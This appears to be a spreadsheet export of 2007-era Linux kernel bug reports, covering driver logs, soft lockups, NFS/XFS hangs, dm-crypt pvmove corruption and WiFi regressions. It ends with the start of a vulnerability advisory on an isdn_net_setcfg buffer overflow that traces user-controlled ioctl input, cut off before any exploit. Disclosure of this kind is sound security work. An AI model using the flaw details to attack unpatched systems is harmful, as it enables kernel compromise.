dma_rwctrl[76ff000f] dma_mask[64-bit] Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:21:20 frank kernel: tg3: eth0: Link is up at 1000 Mbps, full duplex. Nov 10 22:21:20 frank kernel: tg3: eth0: Flow control is on for TX and on for RX. Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:21:20 frank kernel: tg3: eth0: Link is up at 1000 Mbps, full duplex. Nov 10 22:21:20 frank kernel: tg3: eth0: Flow control is on for TX and on for RX. Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:24:40 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:41:48 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:41:48 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:41:48 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:41:48 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:41:48 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:41:49 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:41:49 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:41:49 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:41:49 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:43:02 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:45:52 frank kernel: NETDEV WATCHDOG: eth0: transmit timed out Nov 10 22:45:52 frank kernel: tg3: eth0: transmit timed out, resetting Nov 10 22:45:52 frank kernel: tg3: tg3_stop_block timed out, ofs=1400 enable_bit=2 Nov 10 22:45:52 frank kernel: tg3: tg3_stop_block timed out, ofs=c00 enable_bit=2 Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:45:52 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:45:52 frank kernel: tg3: eth0: Link is down. Nov 10 22:45:56 frank kernel: tg3: eth0: Link is up at 1000 Mbps, full duplex. Nov 10 22:45:56 frank kernel: tg3: eth0: Flow control is on for TX and on for RX. Nov 10 22:47:49 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:47:49 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:47:49 frank kernel: nfs: server 192.168.2.1 not responding, timed out Nov 10 22:49:02 frank kernel: nfs: server 192.168.2.1 not responding, timed out</t>
  </si>
  <si>
    <t>ext4 sets s_maxbytes too low for extent-format files</t>
  </si>
  <si>
    <t>2007-11-15 20:52 UTC</t>
  </si>
  <si>
    <t>2008-01-15 07:54 UTC</t>
  </si>
  <si>
    <t>On an ext4 filesystem, 2.6.24-rc1 + ext4 devel patchset: [root@bear-05 test]# /root/truncate file 4402345721857 Truncating file to 4402345721857 Could not truncate file to 4402345721857 bytes: File too large [root@bear-05 test]# This is roughly 4T. With 48 bits and extents, we should be able to go well above this. however, we'll also have to cope w/ existing bitmapped files, which cannot go that large.</t>
  </si>
  <si>
    <t>Suspend to RAM resume hangs with charging</t>
  </si>
  <si>
    <t>2007-11-15 22:57 UTC</t>
  </si>
  <si>
    <t>2008-12-08 10:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22 Distribution: Debian armel Hardware Environment: ARM XScale-PXA255 (Zaurus C750) Software Environment: Debian Problem Description: PDA hangs if AC power pluged while suspend. Steps to reproduce: Suspend while charging. If HIGH_RES_TIMERS and NO_HZ PDA are set PDA always hangs while suspend. If HIGH_RES_TIMERS and NO_HZ aren't set PDA hangs with charge on while suspend.</t>
  </si>
  <si>
    <t>Logitech Desktop LX 710 extra keys support</t>
  </si>
  <si>
    <t>2.6.22.9 and 2.6.23.1</t>
  </si>
  <si>
    <t>2007-11-16 08:56 UTC</t>
  </si>
  <si>
    <t>Marco Chiappero</t>
  </si>
  <si>
    <t>2008-10-13 08:27 UTC</t>
  </si>
  <si>
    <t>I'm a Logitech Desktop LX-710 owner, one of the newest cordless desktop kits from Logitech. It comes with a unique USB receiver for both mouse and keyboard, and it's pretty similar to the Logitech Desktop S510, sharing the same keyboard layout and extra/multimedia keys (and the probabily the same receiver - S510 with media remote only). Trying to make all the extra keyboard keys work, I've found this about S510: http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.21.y.git;a=commit;h=b55fd23ccdf32f969a7b4180c6e52d62d8e99972 Now, taking a look at the code added in hid-core.c we can see: #define USB_VENDOR_ID_LOGITECH 0x046d #define USB_DEVICE_ID_LOGITECH_USB_RECEIVER 0xc101 +#define USB_DEVICE_ID_LOGITECH_USB_RECEIVER_2 0xc517 and here is a lsusb: marco@alfa:~$ lsusb | grep Logitech Bus 001 Device 002: ID 046d:c517 Logitech, Inc. Infact, in dmesg: [ 24.773558] input: Logitech USB Receiver as /class/input/input1 [ 24.773584] input: USB HID v1.10 Keyboard [Logitech USB Receiver] on usb-0000:00:02.0-1 [ 24.783244] /build/buildd/linux-source-2.6.22-2.6.22/drivers/hid/usbhid/hid-core.c: Fixing up Logitech keyboard report descriptor So it seems to be the same hardware (keys and receiver), but I don't know if they share the same scancodes (they probably do). However I'm still unable to get some of the extra keys working, but I'm not sure whether is a scancodes/keycodes mapping problem or a xorg problem (xev can't see them and running a 2.6.20, prior to that patch, means no extra keys working except multimedia keys). Using the 2.6.22 or the lastest 2.6.23.1 kernel and this configuration in xorg.conf: Section "InputDevice" Identifier "Generic Keyboard" Driver "kbd" Option "CoreKeyboard" Option "XkbRules" "xorg" Option "XkbModel" "pc105" Option "XkbLayout" "it" EndSection almost all the extra keys are working except: Fn + F2 Fn + F3 Picture button Rotate button Zoom+ Zoom- Zoom100% Voip button Shuffle button Fn + Stamp Fn + Break Doing cat /dev/input/event1 reports all the standard 105 keyboard events while cat /dev/input/event2 reports both the extra keyboard keys and mouse events. As soon as possible I'll try to use evrouter to make that keys work but I don't thinks this is the solution and probably a kernel hack is needed.</t>
  </si>
  <si>
    <t>2.6.23.8</t>
  </si>
  <si>
    <t>2007-11-26 12:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.0 Distribution: Debian stable Hardware Environment: Pentium M laptop Software Environment: Debian stable Problem Description: Steps to reproduce: i2c-adapter i2c-5: SMBus Quick command not supported, can't probe for chips i2c-adapter i2c-6: SMBus Quick command not supported, can't probe for chips pcmcia: Detected deprecated PCMCIA ioctl usage from process: discover. pcmcia: This interface will soon be removed from the kernel; please expect breakage unless you upgrade to new tools. pcmcia: see http://www.kernel.org/pub/linux/utils/kernel/pcmcia/pcmcia.html for details. eth0: link down ieee80211_crypt: registered algorithm 'TKIP' BUG: soft lockup detected on CPU#0! [&lt;c0140bf4&gt;] softlockup_tick+0x90/0xaf [&lt;c0120a17&gt;] update_process_times+0x32/0x54 [&lt;c012edfd&gt;] tick_periodic+0x6e/0x78 [&lt;c012ee16&gt;] tick_handle_periodic+0xf/0x5d [&lt;c0126390&gt;] insert_work+0x59/0x5c [&lt;c012ef3c&gt;] tick_do_broadcast+0x1f/0x3f [&lt;c012f05a&gt;] tick_do_periodic_broadcast+0x1a/0x31 [&lt;c012f08c&gt;] tick_handle_periodic_broadcast+0x1b/0x5b [&lt;c01272fb&gt;] __rcu_process_callbacks+0x112/0x170 [&lt;c0106e83&gt;] timer_interrupt+0x34/0x3d [&lt;c0140e66&gt;] handle_IRQ_event+0x1a/0x3f [&lt;c01420df&gt;] handle_level_irq+0x77/0xd0 [&lt;c01061c5&gt;] do_IRQ+0x75/0x8c [&lt;c0220d76&gt;] acpi_hw_register_write+0x11b/0x14b [&lt;c0104713&gt;] common_interrupt+0x23/0x28 [&lt;c0110000&gt;] mc_sysdev_remove+0x2b/0x4b [&lt;c0232ddf&gt;] acpi_processor_idle+0x22f/0x398 [&lt;c0102344&gt;] cpu_idle+0x43/0x71 [&lt;c03d29de&gt;] start_kernel+0x250/0x255 [&lt;c03d2317&gt;] unknown_bootoption+0x0/0x195 ======================= lp: driver loaded but no devices found selinux_register_security: Registering secondary module capability Capability LSM initialized as secondary agpgart: Found an AGP 2.0 compliant device at 0000:00:00.0. agpgart: Putting AGP V2 device at 0000:00:00.0 into 1x mode agpgart: Putting AGP V2 device at 0000:01:00.0 into 1x mode [drm] Setting GART location based on new memory map [drm] Loading R300 Microcode [drm] writeback test succeeded in 2 usecs Bluetooth: L2CAP ver 2.8 Bluetooth: L2CAP socket layer initialized Bluetooth: HIDP (Human Interface Emulation) ver 1.2 Bluetooth: RFCOMM socket layer initialized Bluetooth: RFCOMM TTY layer initialized Bluetooth: RFCOMM ver 1.8 Bluetooth: BNEP (Ethernet Emulation) ver 1.2 Bluetooth: BNEP filters: protocol multicast BUG: soft lockup detected on CPU#0! [&lt;c0140bf4&gt;] softlockup_tick+0x90/0xaf [&lt;c0120a17&gt;] update_process_times+0x32/0x54 [&lt;c012edfd&gt;] tick_periodic+0x6e/0x78 [&lt;c012ee16&gt;] tick_handle_periodic+0xf/0x5d [&lt;c012ef3c&gt;] tick_do_broadcast+0x1f/0x3f [&lt;c012f05a&gt;] tick_do_periodic_broadcast+0x1a/0x31 [&lt;c012f08c&gt;] tick_handle_periodic_broadcast+0x1b/0x5b [&lt;c0106e83&gt;] timer_interrupt+0x34/0x3d [&lt;c0140e66&gt;] handle_IRQ_event+0x1a/0x3f [&lt;c01420df&gt;] handle_level_irq+0x77/0xd0 [&lt;c01061c5&gt;] do_IRQ+0x75/0x8c [&lt;c0104713&gt;] common_interrupt+0x23/0x28 [&lt;c0232b38&gt;] acpi_safe_halt+0x14/0x20 [&lt;c0232ce6&gt;] acpi_processor_idle+0x136/0x398 [&lt;c0102344&gt;] cpu_idle+0x43/0x71 [&lt;c03d29de&gt;] start_kernel+0x250/0x255 [&lt;c03d2317&gt;] unknown_bootoption+0x0/0x195 ======================= BUG: soft lockup detected on CPU#0! [&lt;c0140bf4&gt;] softlockup_tick+0x90/0xaf [&lt;c0120a17&gt;] update_process_times+0x32/0x54 [&lt;c012edfd&gt;] tick_periodic+0x6e/0x78 [&lt;c012ee16&gt;] tick_handle_periodic+0xf/0x5d [&lt;c012ef3c&gt;] tick_do_broadcast+0x1f/0x3f [&lt;c012f05a&gt;] tick_do_periodic_broadcast+0x1a/0x31 [&lt;c012f08c&gt;] tick_handle_periodic_broadcast+0x1b/0x5b [&lt;c0106e83&gt;] timer_interrupt+0x34/0x3d [&lt;c0140e66&gt;] handle_IRQ_event+0x1a/0x3f [&lt;c01420df&gt;] handle_level_irq+0x77/0xd0 [&lt;c01061c5&gt;] do_IRQ+0x75/0x8c [&lt;c0104713&gt;] common_interrupt+0x23/0x28 [&lt;c011007b&gt;] reload_store+0x5b/0x74 [&lt;f997af79&gt;] ipw_irq_tasklet+0x174b/0x17b2 [ipw2200] [&lt;c01e5400&gt;] rb_insert_color+0x8c/0xad [&lt;c0115a2c&gt;] enqueue_entity+0x1d2/0x1f3 [&lt;c0220ba0&gt;] acpi_hw_register_read+0x9b/0x156 [&lt;c011d6a9&gt;] tasklet_action+0x32/0x52 [&lt;c011d611&gt;] __do_softirq+0x35/0x75 [&lt;c011d673&gt;] do_softirq+0x22/0x26 [&lt;c011d83a&gt;] irq_exit+0x29/0x62 [&lt;c01061ca&gt;] do_IRQ+0x7a/0x8c [&lt;c0220d76&gt;] acpi_hw_register_write+0x11b/0x14b [&lt;c0104713&gt;] common_interrupt+0x23/0x28 [&lt;c0110000&gt;] mc_sysdev_remove+0x2b/0x4b [&lt;c0232ddf&gt;] acpi_processor_idle+0x22f/0x398 [&lt;c0102344&gt;] cpu_idle+0x43/0x71 [&lt;c03d29de&gt;] start_kernel+0x250/0x255 [&lt;c03d2317&gt;] unknown_bootoption+0x0/0x195 ======================= BUG: soft lockup detected on CPU#0! [&lt;c0140bf4&gt;] softlockup_tick+0x90/0xaf [&lt;c0120a17&gt;] update_process_times+0x32/0x54 [&lt;c012edfd&gt;] tick_periodic+0x6e/0x78 [&lt;c012ee16&gt;] tick_handle_periodic+0xf/0x5d [&lt;c0126390&gt;] insert_work+0x59/0x5c [&lt;c012ef3c&gt;] tick_do_broadcast+0x1f/0x3f [&lt;c012f05a&gt;] tick_do_periodic_broadcast+0x1a/0x31 [&lt;c012f08c&gt;] tick_handle_periodic_broadcast+0x1b/0x5b [&lt;c0106e83&gt;] timer_interrupt+0x34/0x3d [&lt;c0140e66&gt;] handle_IRQ_event+0x1a/0x3f [&lt;c01420df&gt;] handle_level_irq+0x77/0xd0 [&lt;c01061c5&gt;] do_IRQ+0x75/0x8c [&lt;c0104713&gt;] common_interrupt+0x23/0x28 [&lt;c0232b38&gt;] acpi_safe_halt+0x14/0x20 [&lt;c0232ce6&gt;] acpi_processor_idle+0x136/0x398 [&lt;c0102344&gt;] cpu_idle+0x43/0x71 [&lt;c03d29de&gt;] start_kernel+0x250/0x255 [&lt;c03d2317&gt;] unknown_bootoption+0x0/0x195 ======================= BUG: soft lockup detected on CPU#0! [&lt;c0140bf4&gt;] softlockup_tick+0x90/0xaf [&lt;c0120a17&gt;] update_process_times+0x32/0x54 [&lt;c012edfd&gt;] tick_periodic+0x6e/0x78 [&lt;c012ee16&gt;] tick_handle_periodic+0xf/0x5d [&lt;c012ef3c&gt;] tick_do_broadcast+0x1f/0x3f [&lt;c012f05a&gt;] tick_do_periodic_broadcast+0x1a/0x31 [&lt;c012f08c&gt;] tick_handle_periodic_broadcast+0x1b/0x5b [&lt;c0106e83&gt;] timer_interrupt+0x34/0x3d [&lt;c0140e66&gt;] handle_IRQ_event+0x1a/0x3f [&lt;c01420df&gt;] handle_level_irq+0x77/0xd0 [&lt;c01061c5&gt;] do_IRQ+0x75/0x8c [&lt;c0220d76&gt;] acpi_hw_register_write+0x11b/0x14b [&lt;c0104713&gt;] common_interrupt+0x23/0x28 [&lt;c0110000&gt;] mc_sysdev_remove+0x2b/0x4b [&lt;c0232ddf&gt;] acpi_processor_idle+0x22f/0x398 [&lt;c0102344&gt;] cpu_idle+0x43/0x71 [&lt;c03d29de&gt;] start_kernel+0x250/0x255 [&lt;c03d2317&gt;] unknown_bootoption+0x0/0x195 ======================= BUG: soft lockup detected on CPU#0! [&lt;c0140bf4&gt;] softlockup_tick+0x90/0xaf [&lt;c0120a17&gt;] update_process_times+0x32/0x54 [&lt;c012edfd&gt;] tick_periodic+0x6e/0x78 [&lt;c012ee16&gt;] tick_handle_periodic+0xf/0x5d [&lt;c012ef3c&gt;] tick_do_broadcast+0x1f/0x3f [&lt;c012f05a&gt;] tick_do_periodic_broadcast+0x1a/0x31 [&lt;c012f08c&gt;] tick_handle_periodic_broadcast+0x1b/0x5b [&lt;c0106e83&gt;] timer_interrupt+0x34/0x3d [&lt;c0140e66&gt;] handle_IRQ_event+0x1a/0x3f [&lt;c01420df&gt;] handle_level_irq+0x77/0xd0 [&lt;c01061c5&gt;] do_IRQ+0x75/0x8c [&lt;c0104713&gt;] common_interrupt+0x23/0x28 [&lt;c0300000&gt;] unix_autobind+0x12a/0x14f ======================= BUG: soft lockup detected on CPU#0! [&lt;c0140bf4&gt;] softlockup_tick+0x90/0xaf [&lt;c0120a17&gt;] update_process_times+0x32/0x54 [&lt;c012edfd&gt;] tick_periodic+0x6e/0x78 [&lt;c012ee16&gt;] tick_handle_periodic+0xf/0x5d [&lt;c012ef3c&gt;] tick_do_broadcast+0x1f/0x3f [&lt;c012f05a&gt;] tick_do_periodic_broadcast+0x1a/0x31 [&lt;c012f08c&gt;] tick_handle_periodic_broadcast+0x1b/0x5b [&lt;c0106e83&gt;] timer_interrupt+0x34/0x3d [&lt;c0140e66&gt;] handle_IRQ_event+0x1a/0x3f [&lt;c01420df&gt;] handle_level_irq+0x77/0xd0 [&lt;c01061c5&gt;] do_IRQ+0x75/0x8c [&lt;c0220d76&gt;] acpi_hw_register_write+0x11b/0x14b [&lt;c0104713&gt;] common_interrupt+0x23/0x28 [&lt;c0110000&gt;] mc_sysdev_remove+0x2b/0x4b [&lt;c0232ddf&gt;] acpi_processor_idle+0x22f/0x398 [&lt;c0102344&gt;] cpu_idle+0x43/0x71 [&lt;c03d29de&gt;] start_kernel+0x250/0x255 [&lt;c03d2317&gt;] unknown_bootoption+0x0/0x195 =======================</t>
  </si>
  <si>
    <t>Method .. failed [...BAT0._STA]  AE_TIME - no battery status - ASUS L4500R</t>
  </si>
  <si>
    <t>2007-11-17 06:55 UTC</t>
  </si>
  <si>
    <t>2009-04-01 04:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc2 Distribution: Ubuntu 7.10 Hardware Environment: Pentium M 1.4Ghz, 512MB RAM, ATI 9100IGP Software Environment: gcc 4.1.3 Problem Description: Frequecy scaling works; LCD, brightness and audio buttons with Fn keys work. The battery status is not discovered, the system says is always on AC power. If I unplug the AC power the brightness is dimmed correctly but not the battery status.</t>
  </si>
  <si>
    <t>nfsd gets stuck when underlying filesystem is XFS</t>
  </si>
  <si>
    <t>2007-11-18 06:21 UTC</t>
  </si>
  <si>
    <t>2007-12-10 12:44 UTC</t>
  </si>
  <si>
    <t>9369 9377</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.1 Distribution: Debian/unstable, i386 Hardware Environment: AMD 2600+, 2GB RAM, see http://nerdbynature.de/bits/2.6.24-rc2/nfsd/dmesg.2.gz Software Environment: nfs-kernel-server 1.1.1-8 Problem Description: Exported NFS shares can be mounted (client: 2.6-git/powerpc32, nfs-common-1.1.1~git-20070709-3ubuntu1), but running "ls /mountpoint" (even without "-l") on the client is enough to get the [nfsd] processes in "D" state. Doing this again will put more [nfsd] processes in "D" state and the loadavg is incremented +1. Restarting the rpc.nfsd process on the does not help much, the new rpc.nfsd processes get stuck quickly. This has been reported by Chris Wedgwood too: http://lkml.org/lkml/2007/11/14/50 More details: http://www.nerdbynature.de/bits/2.6.24-rc2/nfsd/ Steps to reproduce: http://www.nerdbynature.de/bits/2.6.24-rc2/nfsd/debug.txt.gz Workarounds: * mount -o vers=2 (tested, works) * mount -o vers=3,nordirplus * set CONFIG_NFSD to "depends on !XFS &amp;&amp; ..."</t>
  </si>
  <si>
    <t>lvmove SATA-&gt;USB with dm-crypt breaks file system</t>
  </si>
  <si>
    <t>2.6.33</t>
  </si>
  <si>
    <t>2007-11-18 08:58 UTC</t>
  </si>
  <si>
    <t>Marti Raudsepp</t>
  </si>
  <si>
    <t>2015-10-18 16:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ??? not tested with earlier than 2.6.19 Distribution: Gentoo Hardware Environment: * USB disk 120GB Western Digital, model 00UE-00KVT0 (according to udev), serial DEF10CD7F64C * SATA disk 200GB Seagate 7200.7, model ST3200822AS * Motherboard Asus A8N5X, nForce4 chipset Software Environment: * Offending file system: reiserfs v3.6, mounted with noatime,barrier=flush * dm-crypt using aes-256 with cbc-essiv:sha256; using assembly-optimized AES on x86_64 (CONFIG_CRYPTO_AES_X86_64) * LVM utilities version: 2.02.17 (2006-12-14) * LVM library version: 1.02.12 (2006-10-13) * LVM driver version: 4.11.0 * cryptsetup-luks 1.0.5 (user space interface to dm-crypt) ---- Problem Description: ---- I'm reporting this here because my bug reports half a year ago on the LKML didn't turn up any solutions. I'd like to stress here that this is a *FULLY REPRODUCIBLE* bug. After lvmove'ing a dm-crypted LVM volume from a SATA disk to a USB disk, reiserfs starts spewing I/O errors with "bio too big device dm-1 (256 &gt; 240)" in dmesg; fsck reports no corruptions, and problems only occur at certain lengths in different files, such as 112k, 240k, 368k, and only with files that existed before, and not newly written files. When copying the partition back to its original disk, everything works again. The same issue applies to ext3 to a lesser extent: the error messages still appear in dmesg, but instead of breaking, ext3 is simply _insanely_ slow; much slower than the USB disk normally is. So this sounds like a workaround in ext3, rather than a bug in reiserfs. None of these problems occur either when: (a) dm-crypt is missing from the picture, or (b) the file system was initialized on the USB disk in the first place. The original bug reports on LKML contain much more detail: * http://article.gmane.org/gmane.linux.kernel/502020 * http://article.gmane.org/gmane.linux.file-systems/13619 * http://article.gmane.org/gmane.linux.kernel/508104 ---- Steps to reproduce: ---- $VOLGROUP - name of the LVM volume group containing both USB and SATA PVs $SATA_PV_DISK - physical volume path of the non-USB disk, e.g. /dev/sda5 $USB_PV_DISK - physical volume path of the USB disk, e.g. /dev/sdc1 mkdir /mnt/punchbag lvcreate -n punchbag --extents=60 primary $SATA_PV_DISK cryptsetup luksFormat /dev/mapper/$VOLGROUP-punchbag cryptsetup luksOpen /dev/mapper/$VOLGROUP-punchbag crypt-punchbag mkfs.reiserfs /dev/mapper/crypt-punchbag mount /dev/mapper/crypt-punchbag /mnt/punchbag -o rw,noatime,barrier=flush # write some stuff onto /mnt/punchbag dd if=/dev/zero of=/mnt/punchbag/junk bs=1M count=10 # make sure that nothing is written onto the disk hereafter mount /mnt/punchbag -o remount,ro pvmove -i2 -npunchbag $SATA_PV_DISK $USB_PV_DISK sync # drop caches: otherwise the newly-written file will already be cached echo 3 &gt; /proc/sys/vm/drop_caches # witness the breakage sha1sum /mnt/punchbag/*</t>
  </si>
  <si>
    <t>Not work chipset broadcom 4318</t>
  </si>
  <si>
    <t>2.6.24-rc3</t>
  </si>
  <si>
    <t>2007-11-18 15:49 UTC</t>
  </si>
  <si>
    <t>2007-11-19 10:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.1 Distribution: Ubuntu Gutsy Hardware Environment: Laptop Software Environment: Default + update of kernel Problem Description: Not work WiFi Steps to reproduce: Change of kernel to 2.6.24-rc3</t>
  </si>
  <si>
    <t>FC8 don't boot from HDD with FreeBSD slice</t>
  </si>
  <si>
    <t>2.6.23.1-42.fc8</t>
  </si>
  <si>
    <t>2007-11-19 02:51 UTC</t>
  </si>
  <si>
    <t>Ivan Cicha</t>
  </si>
  <si>
    <t>2008-09-22 10:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Fedora 8 Hardware Environment: NTB Asus A3F, 2x desktop PC Software Environment: Fedora 8 Problem Description: FC 8 is unable to boot, when FreeBSD (6.2 Release or 7.0Beta2) is presented on HDD. Kernel will stop with message: Trying to resume from LABEL=SWAP-sda6 With noresume kernel option it will stop on: Creating root device. Steps to reproduce: I have on more computers this HDD layout: WinXP (sda1), FreeBSD slice (sda2), extended partiton: WinXP Data, Linux root, Linux SWAP FC8 is unable to boot, when sda2 partition is removed, system boot without any problem and is fully working.</t>
  </si>
  <si>
    <t>2.6.24-rc3: find complains about /proc/net</t>
  </si>
  <si>
    <t>2007-11-19 13:49 UTC</t>
  </si>
  <si>
    <t>2007-12-08 14:22 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc3: find complains about /proc/net Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; References : http://lkml.org/lkml/2007/11/19/253</t>
  </si>
  <si>
    <t>commit a878539ef994787c447a98c2e3ba0fe3dad984ec breaks boot on SB600 AHCI</t>
  </si>
  <si>
    <t>2007-11-19 14:43 UTC</t>
  </si>
  <si>
    <t>2010-01-19 22:08 UTC</t>
  </si>
  <si>
    <t>Shane Huang</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23 Distribution: Fedora 8 Hardware Environment: Athlon AM2, AMD690 chipset, 4 GB RAM, SB600 AHCI controller, Segate SATA hard drives Software Environment: Linux 2.6.24-rc1+ Problem Description: Ever since that commit, Linux fails to boot - constantly reseting the drives during bootup such that power reset is the only option. With mem=3500M, the same kernel image works fine. Steps to reproduce: 1. Boot Linux-2.6.24-rc1+ 2. Observe it constantly resets the hard drives &amp; doesn't successfully boot For more info, please refer to this thread on Linux-IDE (incl. comments from the contributors of this changeset): http://marc.info/?l=linux-ide&amp;m=119456211111119&amp;w=2 Thanks Srihari</t>
  </si>
  <si>
    <t>Not work light of button-led with module b43 in chipset broadcom 4318</t>
  </si>
  <si>
    <t>2007-11-19 20:15 UTC</t>
  </si>
  <si>
    <t>2007-12-20 15:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.1 Distribution: Ubuntu Gutsy Hardware Environment: Compaq Presario V2000 Software Environment: Default + update of kernel Problem Description: In kernel 2.6.23.1 work with module bcm43xx and work light of led, I update to kernel 2.6.24-rc3 and WiFi work. And light of led not work.</t>
  </si>
  <si>
    <t>Linux Kernel isdn_net_setcfg buffer overflow</t>
  </si>
  <si>
    <t>Linux-Kernel-2.6.23</t>
  </si>
  <si>
    <t>2007-11-20 00:02 UTC</t>
  </si>
  <si>
    <t>ADLab</t>
  </si>
  <si>
    <t>2007-11-29 08:23 UTC</t>
  </si>
  <si>
    <t>Linux Kernel isdn_net_setcfg buffer overflow [AD_LAB-0719] Class: Design Error DATE:19/11/2007 Vulnerable: &lt;=Linux-Kernel-2.6.23 Vendor: http://www.kernel.org I.DESCRIPTION: ------------- Linux kernel is an open source operating system. The Linux kernel is prone to an buffer overflow vulnerability. This issue is due to a design error in the 'isdn_net_setcfg()' function. II.DETAILS: ---------- There is a buffer overflow vulnerability in function isdn_net_setcfg(). In function isdn_ioctl, isdn_net_setcfg will be invoked. isdn_ioctl (drivers/isdn/i4l/isdn_common.c): 1270 isdn_ioctl(struct inode *inode, struct file *file, uint cmd, ulong arg) ... ... 1410 case IIOCNETSCF: 1411 /* Set configurable parameters of a network-interface */ 1412 if (arg) { 1413 if (copy_from_user(&amp;cfg, argp, sizeof(cfg))) *** &lt;- cfg is user-controlled 1414 return -EFAULT; 1415 return isdn_net_setcfg(&amp;cfg); *** &lt;- call isdn_net_setcfg() 1416 } else 1417 return -EINVAL; ... At line 1413, the 'cfg' is read from user-space. so the 'cfg' is user-controlled. At line 1415, function isdn_net_setcfg() is invoked. The '&amp;cfg' is passed to isdn_net_setcfg() as an argument. isdn_net_setcfg (drivers/isdn/i41/isdn_net.c): 2664 isdn_net_setcfg(isdn_net_ioctl_cfg * cfg) 2665 { ... 